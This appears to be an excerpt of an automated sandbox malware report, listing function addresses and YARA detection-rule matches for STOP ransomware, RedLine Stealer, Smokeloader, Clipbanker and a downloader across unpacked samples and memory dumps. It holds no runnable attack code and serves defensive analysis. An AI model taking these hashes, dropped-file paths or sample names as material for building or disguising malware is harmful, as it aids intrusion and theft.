    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007460000_2_00746000
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_004080D09_2_004080D0
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040B0869_2_0040B086
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040C92F9_2_0040C92F
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040D5359_2_0040D535
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040CE719_2_0040CE71
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040837D9_2_0040837D
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040C3ED9_2_0040C3ED
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_0040E7B19_2_0040E7B1
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E61B99_2_008E61B9
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E7D1F9_2_008E7D1F
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E56909_2_008E5690
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E36C09_2_008E36C0
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E7E3F9_2_008E7E3F
    Source: C:\Users\user\AppData\Local\Temp\1128.exeCode function: 9_2_008E2F309_2_008E2F30
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00412C5611_2_00412C56
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_00410CE611_2_00410CE6
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_0041123711_2_00411237
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_0041376711_2_00413767
    Source: C:\Users\user\AppData\Roaming\rirdbihCode function: 11_2_0041178811_2_00411788
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD1791117812_2_00007FFD17911178
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD1791198812_2_00007FFD17911988
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD1791770812_2_00007FFD17917708
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007FFD1791509C12_2_00007FFD1791509C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF99196812_2_00000156EF991968
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF99255812_2_00000156EF992558
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF99455C12_2_00000156EF99455C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF99599412_2_00000156EF995994
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF99509412_2_00000156EF995094
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF9922B312_2_00000156EF9922B3
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF99541412_2_00000156EF995414
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00000156EF9929F812_2_00000156EF9929F8
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF871812_2_00007DF449AF8718
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF36A012_2_00007DF449AF36A0
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF15E412_2_00007DF449AF15E4
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B8996412_2_00007DF449B89964
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2190012_2_00007DF449B21900
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF982812_2_00007DF449AF9828
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B4F86412_2_00007DF449B4F864
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2B77C12_2_00007DF449B2B77C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B29B3412_2_00007DF449B29B34
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B6EB3412_2_00007DF449B6EB34
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B85B3C12_2_00007DF449B85B3C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B66AA012_2_00007DF449B66AA0
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2C9FC12_2_00007DF449B2C9FC
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B44A1812_2_00007DF449B44A18
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AF99F012_2_00007DF449AF99F0
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B79D5812_2_00007DF449B79D58
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B3BC8812_2_00007DF449B3BC88
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B21C4C12_2_00007DF449B21C4C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B20C5812_2_00007DF449B20C58
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AE3C6812_2_00007DF449AE3C68
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B5AE8812_2_00007DF449B5AE88
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B20E9812_2_00007DF449B20E98
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B06E6012_2_00007DF449B06E60
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AEFE3812_2_00007DF449AEFE38
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449BA2DE412_2_00007DF449BA2DE4
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B40DF012_2_00007DF449B40DF0
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2B0C812_2_00007DF449B2B0C8
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B5809012_2_00007DF449B58090
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2122412_2_00007DF449B21224
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AE153012_2_00007DF449AE1530
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2D55812_2_00007DF449B2D558
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B784C412_2_00007DF449B784C4
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B2A3F412_2_00007DF449B2A3F4
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AE03D812_2_00007DF449AE03D8
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B4673C12_2_00007DF449B4673C
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B3375412_2_00007DF449B33754
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B636E812_2_00007DF449B636E8
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B6A69812_2_00007DF449B6A698
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449AED60812_2_00007DF449AED608
    Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00007DF449B275A812_2_00007DF449B275A8
    Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
    Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 12.3.rundll32.exe.156f1980000.45.unpack, type: UNPACKEDPEMatched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
    Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 17.0.42FE.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
    Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 12.3.rundll32.exe.156f18d0000.13.unpack, type: UNPACKEDPEMatched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
    Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 12.3.rundll32.exe.156f174f9c8.55.unpack, type: UNPACKEDPEMatched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
    Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
    Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
    Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
    Source: 12.3.rundll32.exe.156f174f9c8.56.unpack, type: UNPACKEDPEMatched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
    Source: 12.3.rundll32.exe.156f174f9c8.57.unpack, type: UNPACKEDPEMatched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
    Source: 0000000E.00000002.705303961.0000000000606000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000014.00000002.439049903.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 0000000E.00000002.706906368.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.287939420.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.288156883.0000000000746000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000010.00000002.427978506.00000000005F6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000014.00000002.438844235.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
